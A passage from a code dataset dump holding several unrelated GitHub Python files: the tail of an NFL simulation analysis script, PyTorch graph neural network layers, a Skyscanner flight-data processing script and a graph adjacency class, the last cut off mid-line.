skip:\n # continue\n\n if '2020' in fp:\n continue\n if 'excl' in fp:\n continue\n if 'n.999' not in fp:\n continue\n\n if 'hm' in fp:\n continue\n\n if 'wk.17' in fp:\n continue\n with open(fp, 'rb') as file:\n results = pickle.load(file)\n # if 'excl_vs_before' in results:\n # results.pop('excl_vs_before')\n # continue\n add_to_running_dict_df(running_dict, results)\n\n print(running_dict)\n print('n =', len(running_dict['home']))\n for key, list_ in running_dict.items():\n #if key not in ['over_under_better_open', 'over_under_better_close']: # 'better_ATS_open', 'better_ATS_close', 'WL_better_vegas',\n # continue\n\n try:\n print(key, ': Average =', round(stat.mean(list_)*100,1), ', median =', round(stat.median(list_),3), ', n =', len(list_))\n method = 'beta'\n\n good = int(len(list_)*stat.mean(list_))\n\n lower_bound, upper_bound = sm.stats.proportion.proportion_confint(good,\n len(list_),\n alpha=.025, method=method.lower())\n print('[' + str(round(lower_bound*100, 1)) + ', ' + str(round(upper_bound*100, 1)) + ']')\n print('(' + str(round(stat.mean(list_)*100,1)) + ' [' + str(round(lower_bound*100, 1)) + ', ' + str(round(upper_bound*100, 1)) + '])')\n\n print('abs avg =', round(stat.median([abs(x) for x in list_]), 3))\n print()\n except:\n pass\n\n\nif __name__ == '__main__':\n #create_max_num_fp()\n sim_season(year=2019, n_sims=999)\n #update_home_mod()\n #analyze_fp()\n","repo_name":"paulcbogdan/NFL-play-by-player","sub_path":"analyze_results.py","file_name":"analyze_results.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"1603438458","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport math\n\nimport torch\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nfrom torch.nn import init\nimport ipdb\n\n### layers###\n#GCN layer\nclass GraphConvolution(Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n support = torch.mm(input, self.weight)\n output = torch.spmm(adj, support)\n #for 3_D batch, need a loop!!!\n\n\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\n#Multihead attention layer\nclass MultiHead(Module):#currently, allowed for only one sample each time. As no padding mask is required.\n def __init__(\n self,\n input_dim,\n num_heads,\n kdim=None,\n vdim=None,\n embed_dim = 128,#should equal num_heads*head dim\n v_embed_dim = None,\n dropout=0.1,\n bias=True,\n ):\n super(MultiHead, self).__init__()\n self.input_dim = input_dim\n self.kdim = kdim if kdim is not None else input_dim\n self.vdim = vdim if vdim is not None else input_dim\n self.num_heads = num_heads\n self.embed_dim = embed_dim\n self.v_embed_dim = v_embed_dim if v_embed_dim is not None else embed_dim\n\n self.dropout = dropout\n self.head_dim = embed_dim // num_heads\n self.bias = bias\n assert (\n self.head_dim * num_heads == self.embed_dim\n ), \"embed_dim must be divisible by num_heads\"\n\n assert self.v_embed_dim % num_heads ==0, \"v_embed_dim must be divisible by num_heads\"\n\n self.scaling = self.head_dim ** -0.5\n\n\n self.q_proj = nn.Linear(self.input_dim, self.embed_dim, bias=bias)\n self.k_proj = nn.Linear(self.kdim, self.embed_dim, bias=bias)\n self.v_proj = nn.Linear(self.vdim, self.v_embed_dim, bias=bias)\n\n self.out_proj = nn.Linear(self.v_embed_dim, self.v_embed_dim//self.num_heads, bias=bias)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n if True:\n # Empirically observed the convergence to be much better with\n # the scaled initialization\n nn.init.normal_(self.k_proj.weight)\n nn.init.normal_(self.v_proj.weight)\n nn.init.normal_(self.q_proj.weight)\n else:\n nn.init.normal_(self.k_proj.weight)\n nn.init.normal_(self.v_proj.weight)\n nn.init.normal_(self.q_proj.weight)\n\n nn.init.normal_(self.out_proj.weight)\n\n if self.out_proj.bias is not None:\n nn.init.constant_(self.out_proj.bias, 0.)\n\n if self.bias:\n nn.init.constant_(self.k_proj.bias, 0.)\n nn.init.constant_(self.v_proj.bias, 0.)\n nn.init.constant_(self.q_proj.bias, 0.)\n\n def forward(\n self,\n query,\n key,\n value,\n need_weights: bool = False,\n need_head_weights: bool = False,\n ):\n \"\"\"Input shape: Time x Batch x Channel\n Args:\n need_weights (bool, optional): return the attention weights,\n averaged over heads (default: False).\n need_head_weights (bool, optional): return the attention\n weights for each head. Implies *need_weights*. Default:\n return the average attention weights over all heads.\n \"\"\"\n if need_head_weights:\n need_weights = True\n\n batch_num, node_num, input_dim = query.size()\n\n assert key is not None and value is not None\n\n #project input\n q = self.q_proj(query)\n k = self.k_proj(key)\n v = self.v_proj(value)\n q = q * self.scaling\n\n #compute attention\n q = q.view(batch_num, node_num, self.num_heads, self.head_dim).transpose(-2,-3).contiguous().view(batch_num*self.num_heads, node_num, self.head_dim)\n k = k.view(batch_num, node_num, self.num_heads, self.head_dim).transpose(-2,-3).contiguous().view(batch_num*self.num_heads, node_num, self.head_dim)\n v = v.view(batch_num, node_num, self.num_heads, self.vdim).transpose(-2,-3).contiguous().view(batch_num*self.num_heads, node_num, self.vdim)\n attn_output_weights = torch.bmm(q, k.transpose(-1,-2))\n attn_output_weights = F.softmax(attn_output_weights, dim=-1)\n\n #drop out\n attn_output_weights = F.dropout(attn_output_weights, p=self.dropout, training=self.training)\n\n #collect output\n attn_output = torch.bmm(attn_output_weights, v)\n attn_output = attn_output.view(batch_num, self.num_heads, node_num, self.vdim).transpose(-2,-3).contiguous().view(batch_num, node_num, self.v_embed_dim)\n attn_output = self.out_proj(attn_output)\n\n\n if need_weights:\n attn_output_weights = attn_output_weights #view: (batch_num, num_heads, node_num, node_num)\n return attn_output, attn_output_weights.sum(dim=1) / self.num_heads\n else:\n return attn_output\n\n\n#Graphsage layer\nclass SageConv(Module):\n \"\"\"\n Simple Graphsage layer\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=False):\n super(SageConv, self).__init__()\n\n self.proj = nn.Linear(in_features*2, out_features, bias=bias)\n\n self.reset_parameters()\n\n print(\"note: for dense graph in graphsage, require it normalized.\")\n\n def reset_parameters(self):\n\n nn.init.normal_(self.proj.weight)\n\n if self.proj.bias is not None:\n nn.init.constant_(self.proj.bias, 0.)\n\n def forward(self, adj, features):\n \"\"\"\n Args:\n adj: can be sparse or dense matrix.\n \"\"\"\n\n #fuse info from neighbors. to be added:\n if not isinstance(adj, torch.sparse.FloatTensor):\n neigh_feature = torch.bmm(adj, features) / (adj.sum(dim=1).reshape((adj.shape[0], adj.shape[1],-1))+1)\n else:\n print(\"spmm not implemented for batch training. Note!\")\n neigh_feature = torch.spmm(adj, features)\n\n #perform conv\n data = torch.cat([features,neigh_feature], dim=-1)\n combined = self.proj(data)\n\n return combined\n\n\n###models###\n\n#GraphSage Like encoder\nclass Encoder(Module):\n \"\"\"\n Simple Graphsage-like encoder\n \"\"\"\n\n def __init__(self, nfeat, nhid, nembedding, dropout=0.1, \n layer_num = 2, \n feature_pre = True,\n feature_dim = None,\n jump = False):\n\n super(Encoder, self).__init__()\n self.layer_num = layer_num\n self.dropout = dropout\n self.feature_pre = feature_pre\n\n if feature_pre:\n feature_dim = nfeat//4\n self.linear_pre = nn.Linear(nfeat, feature_dim)\n nn.init.normal_(self.linear_pre.weight)\n self.conv_first = SageConv(feature_dim, nhid)\n else:\n self.conv_first = SageConv(nfeat, nhid)\n self.conv_hidden = nn.ModuleList([SageConv(nhid+nfeat, nhid) for i in range(layer_num - 2)])\n self.conv_out = SageConv(nhid+nfeat, nembedding)\n \n\n def forward(self, adj, x):\n \"\"\"\n Args:\n adj: can be sparse or dense matrix.\n \"\"\"\n feat = x\n if self.feature_pre:\n x = self.linear_pre(x)\n x = self.conv_first(adj, x)\n x = F.relu(x)\n\n if self.dropout:\n x = F.dropout(x, training=self.training)\n for i in range(self.layer_num-2):\n x = torch.cat([x,feat], dim=-1)\n x = self.conv_hidden[i](adj, x)\n x = F.relu(x)\n if self.dropout:\n x = F.dropout(x, training=self.training)\n\n x = torch.cat([x,feat], dim=-1)\n x = self.conv_out(adj, x)\n\n return x\n\n\n#attr/attr+pos decoder\nclass Decoder(Module):\n \"\"\"\n Simple Graphsage layer\n \"\"\"\n\n def __init__(self, npos, nhid, nfeat, args, dropout=0.1, need_x = True):\n super(Decoder, self).__init__()\n self.dropout = dropout\n\n self.MulHead_pos = MultiHead(npos, 8, embed_dim=8*npos, dropout = self.dropout)\n self.args = args\n self.decode_pre = args.decode_pre\n self.need_x = need_x\n\n n_combine = npos + nhid\n\n if need_x:\n self.MulHead_x = MultiHead(npos, 8, vdim = nhid, v_embed_dim = 8*nhid , dropout = self.dropout)\n\n \n self.MLP_x_1 = nn.Linear(n_combine, n_combine*2)\n self.MLP_x_2 = nn.Linear(n_combine*2, nfeat)\n\n\n self.de_weight = Parameter(torch.FloatTensor(n_combine, n_combine))\n\n self.reset_parameters()\n\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.de_weight.size(1))\n self.de_weight.data.uniform_(-stdv, stdv)\n\n nn.init.normal_(self.MLP_x_1.weight)\n nn.init.normal_(self.MLP_x_2.weight)\n\n def forward(self, x_embed, pos_embed):\n if self.decode_pre:\n pos = self.MulHead_pos(pos_embed, pos_embed, pos_embed)\n\n if x_embed is not None and self.need_x:\n x = self.MulHead_x(pos_embed, pos_embed, x_embed)\n combine = torch.cat([x,pos], dim=-1)\n x_out = self.MLP_x_2(F.relu(self.MLP_x_1(combine)))\n else:\n combine = pos\n x_out = None\n \n elif x_embed is not None and self.need_x:\n #x = self.MulHead_x(pos_embed, pos_embed, x_embed)\n combine = torch.cat([x_embed,pos_embed], dim=-1)\n x_out = self.MLP_x_2(F.relu(self.MLP_x_1(combine)))\n\n #if self.args == 'checkpoint_nopos':\n # combine = x_embed\n \n else:\n combine = torch.cat([x_embed,pos_embed], dim=-1)\n x_out = None\n\n #'''\n #predict adj matrix\n #adj_out = F.tanh(torch.bmm(combine, combine.transpose(-1,-2)))\n combine = F.linear(combine, self.de_weight)\n adj_out = torch.sigmoid(torch.bmm(combine, combine.transpose(-1,-2)))\n\n return adj_out,x_out\n\n \n\n#global readout\nclass ReadOut(Module):\n \"\"\"\n Simple Graphsage layer\n \"\"\"\n\n def __init__(self, ):\n super(ReadOut, self).__init__()\n\n\n def forward(self, X):\n\n\n return X.sum(dim=1)\n\n\n#Translator\nclass Translator(Module):\n \"\"\"\n Simple Graphsage layer\n \"\"\"\n\n def __init__(self, nhid, nfeat, bias=False):\n super(Translator, self).__init__()\n\n self.MLP_1 = nn.Linear(nhid, nhid*3, bias)\n self.MLP_2 = nn.Linear(nhid*3, nfeat, bias)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.normal_(self.MLP_1.weight)\n nn.init.normal_(self.MLP_2.weight)\n\n def forward(self, node_feat, glob_feat):\n combined = torch.cat([node_feat,glob_feat.view(glob_feat.shape[0], 1, glob_feat.shape[-1]).expand(glob_feat.shape[0],node_feat.shape[1],-1)], dim=-1)\n\n out = self.MLP_2(F.relu(self.MLP_1(combined)))\n\n\n return out\n\n#discriminator based on global feature\nclass Glob_Discriminator(Module):\n \"\"\"\n a simple implementation of discriminator based on the global Readout vector\n \"\"\"\n\n def __init__(self, nhid, bias=True):\n super(Glob_Discriminator, self).__init__()\n\n self.MLP_1 = nn.Linear(nhid+nhid, nhid, bias)\n self.MLP_2 = nn.Linear(nhid, 2, bias)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.normal_(self.MLP_1.weight)\n nn.init.normal_(self.MLP_2.weight)\n\n def forward(self, glob_feat_a, glob_feat_b, T=5):\n #ipdb.set_trace()\n out = self.MLP_2(F.relu(self.MLP_1(torch.cat([glob_feat_a, glob_feat_b], dim=-1)))) # get the probability of being real\n #out = F.softmax(self.MLP_2(F.relu(self.MLP_1(torch.cat([glob_feat_a, glob_feat_b], dim=-1))))/T)[:,0] # get the probability of being real\n\n return out\n\n#MI estimator based on paired global feature\n\nclass Glob_MINE(Module):\n \"\"\"\n a simple implementation of Mutual Information Neural Estimation based on the global Readout vector\n \"\"\"\n\n def __init__(self, nhid, bias=True):\n super(Glob_MINE, self).__init__()\n\n self.MLP_1 = nn.Linear(nhid+nhid, nhid, bias)\n self.MLP_2 = nn.Linear(nhid, 2, bias=False)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.normal_(self.MLP_1.weight)\n nn.init.normal_(self.MLP_2.weight)\n\n def forward(self, glob_feat_a, glob_feat_b):\n out = self.MLP_2(F.relu(self.MLP_1(torch.cat([glob_feat_a, glob_feat_b], dim=-1))))\n\n return out\n\n\n\n","repo_name":"TianxiangZhao/SemiGraphTranslation","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"37788949922","text":"import simplejson as json\nimport datetime as dt\nimport time\nimport re\nimport numpy as np\nimport pandas as pd\nfrom sys import argv, exit\nfrom glob import glob\nfrom pprint import pprint as pp\nimport random\nrandom.seed(321)\n\ndef clean_none(data):\n\tnew_data = []\n\tfor i in data:\n\t\tif i is None:\n\t\t\tcontinue\n\t\tnew_data.append(i)\n\treturn new_data\n\t\n\ndef add_leg_info_to_row(row, leg):\n\trow.append(leg['Departure'])\n\trow.append(leg['Arrival'])\n\trow.append(leg['Duration'])\n\trow.append(leg['JourneyMode'])\n\trow.append(leg['OriginStation'])\n\trow.append(leg['DestinationStation'])\n\trow.append(len(leg['Stops']))\n\n\tfor i in range(3):\n\t\tif len(leg['Stops']) >= i + 1:\n\t\t\tif leg['Stops'][i] is None:\n\t\t\t\trow.append('NaN')\n\t\t\telse:\n\t\t\t\trow.append(leg['Stops'][i])\n\t\telse:\n\t\t\trow.append('NaN')\n\n\tfor i in range(3):\n\t\tif len(leg['OperatingCarriers']) >= i + 1:\n\t\t\trow.append(leg['OperatingCarriers'][i])\n\t\telse:\n\t\t\trow.append('NaN')\n\n\tfor i in range(3):\n\t\tif len(leg['Carriers']) >= i + 1:\n\t\t\trow.append(leg['Carriers'][i])\n\t\telse:\n\t\t\trow.append('NaN')\n\n\ndef add_place_info_to_row(dicio, row, row_station):\n\tfor place in dicio['Places']:\n\t\t\tif place['Id'] == row[row_station]:\n\t\t\t\trow.append(place['Name'])\n\t\t\t\trow.append(place['Type'])\n\n\ndef json_to_lists(dicio):\n\t\n\trows = []\n\n\t# limpa o itinerário e retira informações irrelevantes\n\tfor itinerarie in dicio['Itineraries']:\n\t\tp_count = 0\n\t\tfor option in itinerarie['PricingOptions']:\n\t\t\tfor agent in option['Agents']:\n\t\t\t\trow = []\n\t\t\t\trow.append(option['Price']) # add preço\n\t\t\t\tp_count += 1 \n\t\t\t\trow.append(option['QuoteAgeInMinutes']) # add QAgeInMin\n\t\t\t\trow.append(agent)\n\t\t\t\trow.append(itinerarie['InboundLegId'])\t\t\t\t\t\t \n\t\t\t\trow.append(itinerarie['OutboundLegId'])\n\t\t\t\trows.append(row)\n\t\t\t\n\t\t\tif p_count > 5:\n\t\t\t\tbreak\n\t\tif p_count > 5:\n\t\t\t\tbreak\n\n\n\t# row no formato:\n\t# [preço, QAgInMin, Agent, InId, OutId]\n\n\t# limpa os agentes e adiciona infos relevantes às observações\n\tfor row in rows:\n\t\tfor agent in dicio['Agents']:\n\t\t\tif agent['Id'] == row[2]: # se o Id da row e do agente coincidirem\n\t\t\t\trow.append(agent['Name'])\n\t\t\t\trow.append(agent['OptimisedForMobile'])\n\t\t\t\trow.append(agent['Status'])\n\t\t\t\trow.append(agent['Type'])\n\t# row no formato:\n\t# [preço, QAgInMin, Agent, InId, OutId,\n\t# ag_nome, ag_optMobile, ag_stat, ag_type]\n\n\t# limpa os lags e adiciona infos relevantes às observações\n\tvolta_check = False\n\tfor row in rows:\n\t\t\n\t\tfor leg in dicio['Legs']:\n\n\t\t\t# informações sobre a ida\n\t\t\tif leg['Id'] == row[4]: # se o OutId da row e do Lag coincidirem\n\t\t\t\tadd_leg_info_to_row(row, leg)\n\t\t\t\t\n\t\t\t\t# achamos a ida, agora procuramos a volta\n\t\t\t\t# Obs: nem sempre há volta\n\t\t\t\tfor volta_leg in dicio['Legs']:\n\n\t\t\t\t\t# informações sobre a volta (Obs: nem sempre há volta)\n\t\t\t\t\tif volta_leg['Id'] == row[3]:\n\t\t\t\t\t\tadd_leg_info_to_row(row, volta_leg)\n\t\t\t\t\t\tvolta_check = True\n\n\t\t\t\t# Se não acharmos uma volta, adicionamos zeros\n\t\t\t\tif not volta_check:\n\t\t\t\t\tfor unused in range(15):\n\t\t\t\t\t\trow.append('NaN')\n\n\t# row no formato:\n\t# [preço(0), QAgInMin(1), Agent(2), InId(3), OutId(4),\n\t# ag_nome(5), ag_optMobile(6), ag_stat(7), ag_type(8)\n\t# out_saida(9), out_chegada(10), out_dura(11), out_jMode(12),\n\t# \tout_orStat(13), out_desStat(14), out_stops(15), out_stop1(16),\n\t#\tout_stop2(17), out_stop3(18), out_OpCarr1(19), out_OpCarr2(20),\n\t#\tout_OpCarr3(21), out_carr1(22), out_carr2(23), out_carr3(24)\n\t# in_saida(25), in_chegada(26), in_dura(27)_, in_jMode(28), in_orStat(29),\n\t#\tin_desStat(30), out_stops(31), in_stop1(32), in_stop2(33), in_stop3(34),\n\t#\tin_OpCarr1(35), in_OpCarr2(36), in_OpCarr3(37), in_carr1(38),\n\t#\tin_carr2(39), in_carr3(40)]\n\t\t\n\n\t# limpa os places e adiciona infos relevantes às observações\n\tfor row in rows:\n\t\tadd_place_info_to_row(dicio, row, 13)\n\t\tadd_place_info_to_row(dicio, row, 14)\n\n\t\tif volta_check:\n\t\t\tadd_place_info_to_row(dicio, row, 29)\n\t\t\tadd_place_info_to_row(dicio, row, 30)\n\t\telse:\n\t\t\tfor unused in range(4):\n\t\t\t\trow.append('NaN')\n\n\t# row no formato:\n\t# row + [ida_or_nome(41), ida_or_tipo(42), ida_dest_nome(43),\n\t#\tida_dest_tipo(44)\n\t# volta_or_nome(45), volta_or_tipo(46), volta_dest_nome(47),\n\t#\tvolta_dest_tipo(48)]\n\n\t# tempo de coleta e adiciona infos relevantes às observações\n\tfor row in rows:\n\t\tt = dicio['hora_coleta']\n\t\tt_col = dt.datetime(t[0], t[1], t[2], t[3], t[4], t[5])\n\t\trow.append(t_col)\n\n\t\tt_ida = time.strptime(row[9], \"%Y-%m-%dT%H:%M:%S\")\n\t\tt_ida = dt.datetime(*t_ida[0:6])\n\t\tt_delta_ida = t_ida - t_col\n\t\trow.append(t_delta_ida.days)\n\n\t\tt_volta = time.strptime(row[25], \"%Y-%m-%dT%H:%M:%S\")\n\t\tt_volta = dt.datetime(*t_volta[0:6])\n\t\tdura_viagem = t_volta - t_ida\n\t\trow.append(dura_viagem.days)\n\t\t\n\t\tfor t_coleta in dicio['hora_coleta'][6:]:\n\t\t\trow.append(t_coleta)\n\n\t# row no formato:\n\t# row + [col_time(49), t_delta_ida(50), dura_viagem(51), col_wday(50),\n\t# col_yday(51), col_isds(52)]\t\n\t\n\treturn rows\n\n\ndef process(jsons):\n\tdata = clean_none(jsons)\n\n\ttable = np.array(json_to_lists(data[0]))\n\n\t# verifica se o primeiro array da tabela não é vazio\n\t# so continua quando começar a tabela com um array != de zero\n\ti = 1\n\twhile table.shape[0] == 0:\n\t\ttable = np.array(json_to_lists(data[i]))\n\t\ti += 1\n\n\n\tfor dicio in data:\n\t\t\t\t\n\t\t# se não tivermos nenhuma viagem no dicio\n\t\tif dicio['Itineraries'] == []:\n\t\t\tcontinue\n\t\t\n\t\tarr = np.array(json_to_lists(dicio))\n\t\ttable = np.concatenate((table, arr), axis=0)\n\n\tdf = pd.DataFrame(table)\n\tdf.columns = ['preco', 'qAgInMin', 'agent', 'inId', 'outId', 'ag_nome',\n\t 'ag_optMobile', 'ag_stat', 'ag_type',\n\t 'out_saida', 'out_chegada', 'out_dura', 'out_jMode', 'out_orStat',\n\t\t'out_desStat', 'out_stops', 'out_stop1', 'out_stop2', 'out_stop3',\n\t\t'out_opCarr1','out_opCarr2', 'out_opCarr3', 'out_carr1', 'out_carr2',\n\t\t'out_carr3',\n\t 'in_saida', 'in_chegada', 'in_dura', 'in_jMode', 'in_orStat', 'in_desStat',\n\t\t'in_stops', 'in_stop1', 'in_stop2', 'in_stop3', 'in_opCarr1',\n\t\t'in_opCarr2', 'in_opCarr3', 'in_carr1', 'in_carr2', 'in_carr3',\n\t 'ida_or_nome', 'ida_or_tipo', 'ida_dest_nome', 'ida_dest_tipo',\n\t 'volta_or_nome', 'volta_or_tipo', 'volta_dest_nome', 'volta_dest_tipo',\n\t 'col_time', 't_delta_ida', 'dura_viagem', 'col_wday', 'col_yday',\n\t 'col_isds']\n\n\t# cira um id da viagem no formato YYYYMMDDHHDurDur \n\tdf['vid'] = pd.to_datetime(df['out_saida'], format='%Y-%m-%dT%H:%M:%S')\n\tdf['vid'] = df['vid'].map(\n\t\tlambda x: 100000000*x.year + 1000000*x.month + 10000*x.day + 100*x.hour)\n\tdf['vid'] = df['vid'] + df['dura_viagem']\n\n\treturn df\n\n\ndef load_CSVs(path, var_list, max_files='All', n_days = 5):\n\t# defensivo\n\tif 'col_yday' not in var_list:\n\t\tvar_list.append('col_yday')\n\n\tallFiles = glob(path)\n\trandom.shuffle(allFiles)\n\n\tif max_files != 'All':\n\t\tallFiles = allFiles[:max_files]\n\tprint(\"Carregando %d dia(s)...\" % n_days)\n\tframe = pd.DataFrame()\n\tlist_ = []\n\n\tcateg_var = ['ag_type', 'agent', 'out_orStat', 'out_desStat', 'out_opCarr1',\n\t\t'out_opCarr2', 'out_opCarr3', 'in_opCarr1', 'in_opCarr2', 'in_opCarr3',\n\t\t'in_orStat', 'in_desStat', 'in_carr1', 'in_carr2', 'in_carr3',\n\t\t'out_carr1', 'out_carr2', 'out_carr3', 'in_jMode', 'out_jMode',\n\t\t'in_orStat', 'ida_or_nome', 'ida_or_tipo', 'ida_dest_tipo',\n\t\t'ida_dest_nome', 'volta_or_nome', 'volta_or_tipo', 'volta_dest_tipo',\n\t\t'volta_dest_nome', 'ag_nome', 'ag_stat', 'in_stop1', 'in_stop2',\n\t\t'in_stop3', 'out_stop1', 'out_stop2', 'out_stop3']\n\t\n\tdate_time_var = ['out_saida', 'out_chegada', 'in_saida', 'in_chegada']\n\t\n\tseen_days = []\n\twhile len(seen_days) + 1 <= n_days:\n\t\tfile = allFiles.pop()\n\n\t\t# defensivo\n\t\tif file[-4:] != '.csv':\n\t\t\tprint('Arquivo %s não é do formato esperado' % file)\n\t\t\tprint(\"Arquivo deve ser uma df no formato csv, sep = ';'\")\n\t\t\texit(1)\n\n\t\tdf = pd.read_csv(file, sep = ';', header = 0, usecols = var_list)\n\t\n\t\t\t\n\t\tif df.col_yday.unique()[0] not in seen_days:\n\t\t\tseen_days.append(df.col_yday.unique()[0])\n\n\t\tlist_.append(df)\n\n\tframe = pd.concat(list_, ignore_index=True)\n\t\t\n\tvars_in_frame = frame.columns\n\t# converte para os tipos certos\n\tfor var in categ_var:\n\t\tif var in vars_in_frame:\n\t\t\tframe[var] = frame[var].astype('category')\n\n\tfor var in date_time_var:\n\t\tif var in vars_in_frame:\n\t\t\tframe[var] = np.array(frame[var], dtype='datetime64')\n\treturn frame\n\n\ndef data_split(frame, shuffle = False, test_stize = 0.2, test_days = 1):\n\t\n\tif shuffle:\n\t\tframe = frame.iloc[np.random.permutation(len(frame))]\n\t\tframe = frame.reset_index(drop=True)\n\t\tif test_stize > 1 or test_stize < 0:\n\t\t\tprint('Tamanho do set de teste deve ser no máximo 1')\n\t\t\texit(1)\n\n\t\tmsk = np.random.rand(len(frame)) < 1 - test_stize\n\t\ttrain = frame[msk]\n\t\ttest = frame[~msk]\n\t\n\telse:\n\t\tframe.sort_values(by=['col_yday'], ascending=[True], inplace = True)\n\t\tdays = frame.col_yday.unique()\n\t\tprint(days)\n\n\t\tprint(days[-test_days:])\n\t\ttest = frame.loc[frame['col_yday'].isin(days[-test_days:])]\n\t\ttrain = frame.loc[~frame['col_yday'].isin(days[-test_days:])]\n\n\treturn train, test\n\n\ndef make_folds(training_df, folds = 3):\n\t\n\tdays = training_df.col_yday.unique()\n\tn_days = len(days)\n\n\ttrain = []\n\n\t# faz os folds\n\tif folds and n_days > 2 and n_days % folds == 0:\n\t\tdays_per_fold = int(n_days / folds)\n\t\tfor i in range(0, n_days, days_per_fold):\n\t\t\t\n\t\t\tsv = (training_df['col_yday'] >= days[i]) \n\t\t\tsv = sv & (training_df['col_yday'] <= days[i + days_per_fold - 1])\n\t\t\tprint('Fold: ', training_df[sv].col_yday.unique())\n\t\t\ttrain.append(training_df[sv])\n\n\telse:\n\t\tprint('Não conseguiu criar os folds')\n\t\treturn training_df\n\n\treturn train \n\n\n\n\nif __name__ == '__main__':\n\n\t\t\n\tfiles = argv[1:] # pega os arquivos\n\tfor file in files:\n\t\t\n\t\t# ensure proper usage\n\t\tif file[-5:] != '.json':\n\t\t\tprint('Uso: \\n `python3 skyscannerfile.json` ou\\n '\\\n\t\t\t\t'`python3 *.json` ')\n\t\t\tprint('Arquivo %s não é do formato esperado' % file)\n\t\t\texit(1)\n\n\t\t# lê o arquivo\n\t\twith open(file, 'r') as in_file:\n\t\t\tdata = json.load(in_file)\n\n\n\t\t# processa os dados em uma data frame\n\t\tprint('\\nProcessando %s ...' % file)\n\t\tt0 = time.time()\n\t\tpdata = process(data)\n\t\tprint('Tempo para processar %s:' % file, round(time.time()-t0, 3), 's')\n\n\t\t# salva em csv\n\t\tout_file = file[0:-5] + '.csv'\n\t\tprint('\\nSalvando %s ...' % out_file)\n\n\t\tt0 = time.time()\n\t\tpdata.to_csv(out_file, sep = ';', date_format = '%Y', index = False)\n\t\tprint('Tempo para salvar %s:' % out_file, round(time.time()-t0, 3), 's')\n\t\tprint('\\n')\n\n\n","repo_name":"matheusfacure/Passagens","sub_path":"tools/process_skyscanner.py","file_name":"process_skyscanner.py","file_ext":"py","file_size_in_byte":10225,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12568384066","text":"# import json\r\n\r\n\r\nclass Graph(object):\r\n _graph = None\r\n\r\n def __init__(self, f_path):\r\n with open(f_path) as f:\r\n is_oriented = \"->\" in f.readline()\r\n # print(\"oriented = {}\".format(is_oriented))\r\n self.n_vertex, self.n_edge = map(int, f.readline().strip().split())\r\n self.vertex_pairs = {}\r\n for i in f.readlines():\r\n edge_info = [int(j) for j in i.strip().split()]\r\n self.vertex_pairs[(edge_info[0], edge_info[1])] = 1 if len(edge_info) == 2 else edge_info[2]\r\n \r\n # print(\"{}\\n{}\\n{}\".format(self.n_vertex, self.n_edge, \"\\n\".join([str(k) for k in self.vertex_pairs])))\r\n self.build_graph(self.vertex_pairs, is_oriented)\r\n\r\n def build_graph(self, vertex_pairs, is_oriented):\r\n raise NotImplementedError\r\n\r\n def neighbours(self, v):\r\n raise NotImplementedError\r\n\r\n def weight(self, u, v):\r\n return self.vertex_pairs[(u, v)]\r\n\r\n\r\nclass AdjacencyMatrix(Graph):\r\n \"\"\"For small graphs\"\"\"\r\n\r\n def build_graph(self, vertex_pairs, is_oriented):\r\n self._graph = [[0 for _ in range(self.n_vertex)] for _ in range(self.n_vertex)]\r\n for i, j in vertex_pairs:\r\n self._graph[i][j] = 1\r\n if not is_oriented:\r\n self._graph[j][i] = 1\r\n # print(json.dumps(self._graph, indent=1))\r\n\r\n def neighbours(self, v):\r\n return (i for i in range(self.n_vertex) if self._graph[v][i])\r\n\r\n def __str__(self):\r\n return \"\\n\".join([\" \".join([str(self._graph[i][j]) for j in range(self.n_vertex)]) for i in range(self.n_vertex)])\r\n\r\n\r\nclass AdjacencySet(Graph):\r\n \"\"\"For big graphs with not so big number of edges\"\"\"\r\n\r\n def build_graph(self, vertex_pairs, is_oriented):\r\n self._graph = [set() for _ in range(self.n_vertex)]\r\n for i, j in vertex_pairs:\r\n self._graph[i].add(j)\r\n if not is_oriented:\r\n self._graph[j].add(i)\r\n # print(json.dumps(self._graph, indent=1))\r\n\r\n def neighbours(self, v):\r\n return (i for i in self._graph[v])\r\n\r\n def __str__(self):\r\n return \"\\n\".join([\" \".join([str(i)] + [str(j) for j in self._graph[i]]) for i in range(self.n_vertex)])\r\n\r\n\r\nadj_m_1 = AdjacencyMatrix(\"graph_example_1.txt\")\r\nadj_s_1 = AdjacencySet(\"graph_example_1.txt\")\r\nadj_m_2 = AdjacencyMatrix(\"graph_example_2.txt\")\r\nadj_s_2 = AdjacencySet(\"graph_example_2.txt\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # import networkx as nx\r\n print(\"Example 1:\")\r\n print(\"AdjacencyMatrix:\\n\" + str(adj_m_1))\r\n print(\"AdjacencySet:\\n\" + str(adj_s_1))\r\n print(\"Example 2:\")\r\n print(\"AdjacencyMatrix:\\n\" + str(adj_m_2))\r\n print(\"AdjacencySet:\\n\" + str(adj_s_2))\r\n # print(\"Adjacency 